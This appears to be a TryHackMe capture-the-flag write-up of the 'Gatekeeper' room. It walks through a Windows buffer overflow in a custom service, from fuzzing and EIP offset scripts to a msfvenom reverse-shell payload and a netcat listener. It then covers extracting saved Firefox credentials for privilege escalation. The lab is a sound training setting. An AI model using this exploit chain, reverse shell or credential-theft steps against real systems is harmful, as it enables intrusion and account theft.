Gatekeeper - Buffer Overflow
TryHackMe link: https://tryhackme.com/room/gatekeeper
Recon
Let’s get started with the nmap scan. I also kicked off the threader3000 port scanner script (https://github.com/dievus/threader3000.git) which I have started to like a lot since it often reveals ports that were missed by nmap scans.
1# nmap -Pn -A -T4 -oN gatekeeper.nmap.txt 10.10.200.236
2Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
3Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-29 09:15 EST
4Nmap scan report for 10.10.200.236
5Host is up (0.078s latency).
6Not shown: 990 closed ports
7PORT STATE SERVICE VERSION
8135/tcp open msrpc Microsoft Windows RPC
9139/tcp open netbios-ssn Microsoft Windows netbios-ssn
10445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
113389/tcp open ms-wbt-server?
12| ssl-cert: Subject: commonName=gatekeeper
13| Not valid before: 2020-11-28T14:03:48
14|_Not valid after: 2021-05-30T14:03:48
15|_ssl-date: 2020-11-29T14:18:50+00:00; 0s from scanner time.
1631337/tcp open Elite?
17| fingerprint-strings:
18| FourOhFourRequest:
19| Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
20| Hello
21| GenericLines:
22| Hello
23| Hello
24| GetRequest:
25| Hello GET / HTTP/1.0
26| Hello
27| HTTPOptions:
28| Hello OPTIONS / HTTP/1.0
29| Hello
30| Help:
31| Hello HELP
32| Kerberos:
33| Hello !!!
34| LDAPSearchReq:
35| Hello 0
36| Hello
37| LPDString:
38| Hello
39| default!!!
40| RTSPRequest:
41| Hello OPTIONS / RTSP/1.0
42| Hello
43| SIPOptions:
44| Hello OPTIONS sip:nm SIP/2.0
45| Hello Via: SIP/2.0/TCP nm;branch=foo
46| Hello From: <sip:nm@nm>;tag=root
47| Hello To: <sip:nm2@nm2>
48| Hello Call-ID: 50000
49| Hello CSeq: 42 OPTIONS
50| Hello Max-Forwards: 70
51| Hello Content-Length: 0
52| Hello Contact: <sip:nm@nm>
53| Hello Accept: application/sdp
54| Hello
55| SSLSessionReq, TLSSessionReq, TerminalServerCookie:
56|_ Hello
5749152/tcp open msrpc Microsoft Windows RPC
5849153/tcp open msrpc Microsoft Windows RPC
5949154/tcp open msrpc Microsoft Windows RPC
6049160/tcp open msrpc Microsoft Windows RPC
6149161/tcp open msrpc Microsoft Windows RPC
621 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
63SF-Port31337-TCP:V=7.91%I=7%D=11/29%Time=5FC3AD22%P=x86_64-pc-linux-gnu%r(
64SF:GetRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%
65SF:r(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\x2
66SF:0Via:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:nm@
67SF:nm>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-ID
68SF::\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-For
69SF:wards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Contact
70SF::\x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHello\
71SF:x20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(HT
72SF:TPOptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n
73SF:")%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x20
74SF:\r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x20
75SF:\x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSSes
76SF:sionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(Fo
77SF:urOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2eb
78SF:ak\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01d
79SF:efault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n
80SF:");
81No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
82TCP/IP fingerprint:
83OS:SCAN(V=7.91%E=4%D=11/29%OT=135%CT=1%CU=30072%PV=Y%DS=4%DC=T%G=Y%TM=5FC3A
84OS:DCB%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%T
85OS:S=7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=
86OS:M506NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2
87OS:000)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A
88OS:=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=
89OS:Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%R
90OS:D=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=
91OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
92OS:1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
93OS:I=N%T=80%CD=Z)
94
95Network Distance: 4 hops
96Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows
97
98Host script results:
99|_clock-skew: mean: 1h14m59s, deviation: 2h30m00s, median: -1s
100|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:90:ad:0c:68:97 (unknown)
101| smb-os-discovery:
102| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
103| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
104| Computer name: gatekeeper
105| NetBIOS computer name: GATEKEEPER\x00
106| Workgroup: WORKGROUP\x00
107|_ System time: 2020-11-29T09:18:44-05:00
108| smb-security-mode:
109| account_used: guest
110| authentication_level: user
111| challenge_response: supported
112|_ message_signing: disabled (dangerous, but default)
113| smb2-security-mode:
114| 2.02:
115|_ Message signing enabled but not required
116| smb2-time:
117| date: 2020-11-29T14:18:44
118|_ start_date: 2020-11-29T14:03:47
119
120TRACEROUTE (using port 995/tcp)
121HOP RTT ADDRESS
1221 8.23 ms 10.6.0.1
1232 ... 3
1244 77.60 ms 10.10.200.236
125
126OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
127Nmap done: 1 IP address (1 host up) scanned in 181.97 seconds
128
Some important observations -
- Threader3000 came back with same list of ports which is great.
- 31337/tcp open Elite seems most interesting
- SMB share accepts guest login and that may help us look around
1# nc 10.10.200.236 31337
2hello
3Hello hello!!!
4sadsadfsadfdsfdsfdsfdfsdfsdfsdfdsfsdfsfsdfsfsdfsdfsdfsfafsdfds
5Hello sadsadfsadfdsfdsfdsfdfsdfsdfsdfdsfsdfsfsdfsfsdfsdfsdfsfafsdfds!!!
6
Enumeration
SMB Share enumeration
Lets run smbmap to scan the SMB shares and permissions. You will notice that the Users share has READONLY access for the guest user and that could be our way in!
1eneloop@kinetic:~$ smbmap -u guest -H 10.10.200.236
2[+] IP: 10.10.200.236:445 Name: 10.10.200.236
3 Disk Permissions Comment
4 ---- ----------- -------
5 ADMIN$ NO ACCESS Remote Admin
6 C$ NO ACCESS Default share
7 IPC$ NO ACCESS Remote IPC
8 Users READONLY
9eneloop@kinetic:~$
Make a connection to the share and look around, you will find “gatekeeper.exe” which is likely the service that runs on the port 31337 and we can try an exploit this.
1eneloop@kinetic:~$ smbclient //10.10.200.236/Users -U guest
2Enter WORKGROUP\guest's password:
3Try "help" to get a list of possible commands.
4smb: \> dir
5 . DR 0 Thu May 14 21:57:08 2020
6 .. DR 0 Thu May 14 21:57:08 2020
7 Default DHR 0 Tue Jul 14 03:07:31 2009
8 desktop.ini AHS 174 Tue Jul 14 00:54:24 2009
9 Share D 0 Thu May 14 21:58:07 2020
10
11 7863807 blocks of size 4096. 3820448 blocks available
12smb: \> cd share
13smb: \share\> dir
14 . D 0 Thu May 14 21:58:07 2020
15 .. D 0 Thu May 14 21:58:07 2020
16 gatekeeper.exe A 13312 Mon Apr 20 01:27:17 2020
17
18 7863807 blocks of size 4096. 3845396 blocks available
19smb: \share\>
20
Lets download the file for further inspection -
1smb: \share\> get gatekeeper.exe
2getting file \share\gatekeeper.exe of size 13312 as gatekeeper.exe (33.3 KiloBytes/sec) (average 33.3 KiloBytes/sec)
Exploit
Prepare for reverse engineering of the application
Fire up your windows VM (or you can use any windows host) and copy over the gatekeeper.exe at your favorite location. You will have to prepare this machine to allow us to run a debugger and analyze the stack.
Here are the tools we need installed on this windows machine -
- Immunity Debugger (https://www.immunityinc.com/products/debugger/)
- Mona (https://github.com/corelan/mona)
Please follow the instructions from these tools and install/configure them. Once done, proceed to launch the immunity debugger as administrator.
DLL Error Fix
If you receive an error like below, please download the Microsoft Visual C++ Redistributable (32 bit version) and install on your local windows machine.
https://www.microsoft.com/en-us/download/details.aspx?id=52685
High level approach
- Try to send long strings (filled with A’s) with increasing lengths and check if the application crashes. The EIP register will be overwritten by A’s but we will still be unsure of the offset.
- Based on the approximate bytes from above, generate a cyclic pattern and note the EIP contents. This will help us identify the EIP offset.
- Once we have the EIP control, we will use mona to identify and filter out the bad characters (could be multiple iterations based on number of bad characters), then we will generate a payload that can get us reverse shell.
- Run the exploit against the THM host and gain access.
1import socket, time, sys
2
3ip = "10.0.0.11"
4port = 31337
5timeout = 5
6
7buffer = []
8counter = 100
9while len(buffer) < 30:
10 buffer.append("A" * counter)
11 counter += 100
12
13for string in buffer:
14 try:
15 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16 s.settimeout(timeout)
17 connect = s.connect((ip, port))
18 print("Sending %s bytes" % len(string))
19 s.send(string + "\r\n")
20 s.recv(1024)
21 s.close()
22 except:
23 print("Could not connect to " + ip + ":" + str(port))
24 sys.exit(0)
25 time.sleep(1)
26
The program crashed around 200 bytes but when you look at the stack, the EIP is now filled with \x41\x41\x41\x41 which means AAAA.
Now, lets write a similar program with 200 + 400 = 600 bytes of cyclic pattern so that we can identify the offset for the EIP register.
1# msf-pattern_create -l 600
2Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9
3
Now, lets restart immunity and make sure the application is running. Then, write a small script to send the new payload that will help us identify the offset for EIP.
1import socket
2
3ip = "10.0.0.11"
4port = 31337
5prefix = ""
6offset = 0
7overflow = "A" * offset
8retn = ""
9padding = ""
10payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
11postfix = ""
12
13buffer = prefix + overflow + retn + padding + payload + postfix
14
15s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16
17try:
18 s.connect((ip, port))
19 print("Sending buffer...")
20 s.send(buffer + "\r\n")
21 print("Done!")
22except:
23 print("Could not connect.")
24
This should crash the program but the EIP register now will have the pattern. Based on the output, the EIP is at 39654138.
You can now figure out the offset to be at - 146.
1# msf-pattern_offset -q 39654138
2[*] Exact match at offset 146
3
Now, lets try to control the EIP by filling it with BBBB (42’s) by specifying a return address. Please be sure to restart the debugger and run the program, then proceed to running the following script -
1import socket
2ip = "10.0.0.11"
3port = 31337
4prefix = ""
5offset = 146
6overflow = "A" * offset
7# retn = ""
8retn = "BBBB"
9padding = ""
10
11payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
12
13postfix = ""
14buffer = prefix + overflow + retn + padding + payload + postfix
15s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16try:
17 s.connect((ip, port))
18 print("Sending buffer...")
19 s.send(buffer + "\r\n")
20 print("Done!")
21except:
22 print("Could not connect.")
1!mona bytearray -b "\x00"
1!mona compare -f C:\mona\oscp\bytearray.bin -a 006719e4
1!mona bytearray -b "\x00\x0a"
Adjust the payload to remove the \x0a character and resend it so we can compare the memory and file contents using the debugger and identify any additional bad characters.
1!mona compare -f C:\mona\oscp\bytearray.bin -a 007319e4
Find out JMP pointers that we can use for the exploit -
We can use the first pointer address x080414c3 (\x08\x04\x14\xc3)as our return address. Since Windows uses little endian format, the pointer address should be reversed in our script as \xc3 \x14 \x04 \x08
Now, lets build an exploit without using the bad characters we already identified and try to get a reverse shell.
1msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.8 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f py
Plug this in as a payload and fire it while the gatekeeper is running. Do not forget to start a local listener on port 4444. The exploit should succeed and you should have a shell.
1# nc -nvlp 4444
2listening on [any] 4444 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.133.127] 49173
4Microsoft Windows [Version 6.1.7601]
5Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Now, since you have successfully exploited the gatekeeper.exe, you can just change the IP to the IP of the THM machine and fire the exploit. This should gain you the low level shell access.
When you look around you will notice the user.txt.txt with the user flag. Also notice the contents of other files such as gatekeeperstart.bat (Tries to restart the gatekeeper service every 5 minutes and this could be scheduled job we can exploit.), the firefox.lnk is a shortcut but a potential breadcrumb as you will notice further.
1C:\Users\natbat\Desktop>dir
2dir
3 Volume in drive C has no label.
4 Volume Serial Number is 3ABE-D44B
5
6 Directory of C:\Users\natbat\Desktop
7
805/14/2020 08:24 PM <DIR> .
905/14/2020 08:24 PM <DIR> ..
1004/21/2020 04:00 PM 1,197 Firefox.lnk
1104/20/2020 12:27 AM 13,312 gatekeeper.exe
1204/21/2020 08:53 PM 135 gatekeeperstart.bat
1305/14/2020 08:43 PM 140 user.txt.txt
14 4 File(s) 14,784 bytes
15 2 Dir(s) 15,878,447,104 bytes free
16
17C:\Users\natbat\Desktop>type Firefox.lnk
18type Firefox.lnk
19L�F� �j7���j7����� ����DG�Yr?�D��U��k0�~tCFSF1�P�� AppDatat�Y^���H�g3��(����ߟgVA�G��k��ユP��P��*�AppDataBL1�P� LocalユP��P�*TULocald1�P� MOZILL~1ユP��P�*�sMozilla Firefox^2���P5� firefox.exeユP��P�*�sfirefox.exe��-8_KԾ:C:\Users\'\\GATEKEEPER\Usersnatbat\AppData\Local\Mozilla Firefox\firefox.exe,..\AppData\Local\Mozilla Firefox\firefox.exe-C:\Users\natbat\AppData\Local\Mozilla Firefox
20���'t�1��8 ��1SPS�XF�L8C���&�m�m.S-1-5-21-663372427-3699997616-3390412905-1003b1SPSU(L�y�9K����-��� �|��I�J�H��K�`�Xgatekeeperj�8 �}�����p�
21
22 ��54B4832DCE3D0EB51
23C:\Users\natbat\Desktop>
24
Post-Exploitation/Privesc
Upload WinPEAS using smb share.
The /Users location is READONLY, but if you change directory to /Users/Share, you can now write. Upload the winpeas.bat file so we can run it from the command line.
1# smbclient //10.10.133.127/Users -U guest
2Enter WORKGROUP\guest's password:
3Try "help" to get a list of possible commands.
4smb: \> put winPEAS.bat
5NT_STATUS_ACCESS_DENIED opening remote file \winPEAS.bat
6smb: \> pwd
7Current directory is \\10.10.133.127\Users\
8smb: \> dir
9 . DR 0 Thu May 14 21:57:08 2020
10 .. DR 0 Thu May 14 21:57:08 2020
11 Default DHR 0 Tue Jul 14 03:07:31 2009
12 desktop.ini AHS 174 Tue Jul 14 00:54:24 2009
13 Share D 0 Thu May 14 21:58:07 2020
14
15 7863807 blocks of size 4096. 3876583 blocks available
16
17smb: \> cd Share
18smb: \Share\> put winPEAS.bat
19putting file winPEAS.bat as \Share\winPEAS.bat (101.4 kb/s) (average 101.4 kb/s)
20smb: \Share\>
21
The WinPEAS script ran for several minutes so be patient! The scan comes back with a lot of information so take your time to go through all of it. Towards the very last section of the report, you will notice that there is a firefox profile location and we can potentially look for any credentials we can extract. Before choosing a path for PrivEsc, I typically take the easiest routes first as we can rule them out quickly and then focus on complex paths which need more time and often end up being rabbit holes.
1 [+] Files in registry that may contain credentials
2 [i] Searching specific files that may contains credentials.
3 [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
4Looking inside HKCU\Software\ORL\WinVNC3\Password
5Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
6Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
7 DefaultDomainName REG_SZ
8 DefaultUserName REG_SZ
9Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
10Looking inside HKCU\Software\TightVNC\Server
11Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
12Looking inside HKCU\Software\OpenSSH\Agent\Keys
13
14C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\places.sqlite
15C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\key4.db
16C:\Windows\Panther\unattend.xml
17C:\Windows\Panther\setupinfo
18C:\Windows\winsxs\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_6f0f7833cb71e18d\appcmd.exe
19C:\Windows\winsxs\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_79642285ffd2a388\appcmd.exe
20
I uploaded the firefox_decrypt script using the same method used for winpeas but it did not help much as the windows machine did not have python installed.
We can download these profiles to pur attack machine and try to decrypt locally. From the shell, copy the profiles to C:\Users\Share directory and from there using the smbclient, download the files to your attack machine as shown below.
1C:\Users\natbat\AppData\Roaming\Mozilla\Firefox>Xcopy /E /I Profiles C:\Users\Share
2Xcopy /E /I Profiles C:\Users\Share
3Overwrite C:\Users\Share\copy (Yes/No/All)? All
4A
5Profiles\copy
6Profiles\ljfn812a.default-release\addons.json
7Profiles\ljfn812a.default-release\addonStartup.json.lz4
8Profiles\ljfn812a.default-release\AlternateServices.txt
9Profiles\ljfn812a.default-release\broadcast-listeners.json
10Profiles\ljfn812a.default-release\cert9.db
11Profiles\ljfn812a.default-release\compatibility.ini
12Profiles\ljfn812a.default-release\containers.json
13Profiles\ljfn812a.default-release\content-prefs.sqlite
14Profiles\ljfn812a.default-release\cookies.sqlite
15Profiles\ljfn812a.default-release\extension-preferences.json
16
17..
18..
19..
20..
Download these files to your attack machine where we can try to extract passwords.
1# smbclient //10.10.133.127/Users -U guest
2Enter WORKGROUP\guest's password:
3Try "help" to get a list of possible commands.
4smb: \> pwd
5Current directory is \\10.10.133.127\Users\
6smb: \> dir
7 . DR 0 Thu May 14 21:57:08 2020
8 .. DR 0 Thu May 14 21:57:08 2020
9 Default DHR 0 Tue Jul 14 03:07:31 2009
10 desktop.ini AHS 174 Tue Jul 14 00:54:24 2009
11 Share DAn 0 Mon Nov 30 23:23:00 2020
12
13 7863807 blocks of size 4096. 3831106 blocks available
14smb: \> cd Share
15smb: \Share\> recurse on
16smb: \Share\> prompt off
17smb: \Share\> mget *
18getting file \Share\copy of size 0 as copy (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
19getting file \Share\firefox_decrypt.py of size 34624 as firefox_decrypt.py (62.4 KiloBytes/sec) (average 40.1 KiloBytes/sec)
20getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (31.7 KiloBytes/sec) (average 37.4 KiloBytes/sec)
21getting file \Share\ljfn812a.default-release\addons.json of size 24 as addons.json (0.1 KiloBytes/sec) (average 28.2 KiloBytes/sec)
22getting file \Share\ljfn812a.default-release\addonStartup.json.lz4 of size 1952 as addonStartup.json.lz4 (4.4 KiloBytes/sec) (average 23.2 KiloBytes/sec)
23getting file \Share\ljfn812a.default-release\AlternateServices.txt of size 0 as AlternateServices.txt (0.0 KiloBytes/sec) (average 20.5 KiloBytes/sec)
Now, run the decrypt tool locally to reveal the passwords for user “mayor” as below -
1# python ./firefox_decrypt.py gatekeeper/data/firefox/ljfn812a.default-release/
22020-11-30 23:32:02,386 - WARNING - profile.ini not found in gatekeeper/data/firefox/ljfn812a.default-release/
32020-11-30 23:32:02,386 - WARNING - Continuing and assuming 'gatekeeper/data/firefox/ljfn812a.default-release/' is a profile location
4
5Master Password for profile gatekeeper/data/firefox/ljfn812a.default-release/:
62020-11-30 23:32:13,034 - WARNING - Attempting decryption with no Master Password
7
8Website: https://creds.com
9Username: 'mayor'
10Password: 'XXXXXXXXXXXXXXXXXXXXX'
11
With these credentials, I fired up Remmina (Remote desktop client) and connected to the machine remotely.
You may have to wait a minute or two to get the desktop screen.
You will see the root flag inside root.txt file on the desktop.
And thats how you root this wonderful machine! I am very sure there are more ways to get root on this machine. If you have questions/suggestions, please feel free to write me an email.
- wirem0nster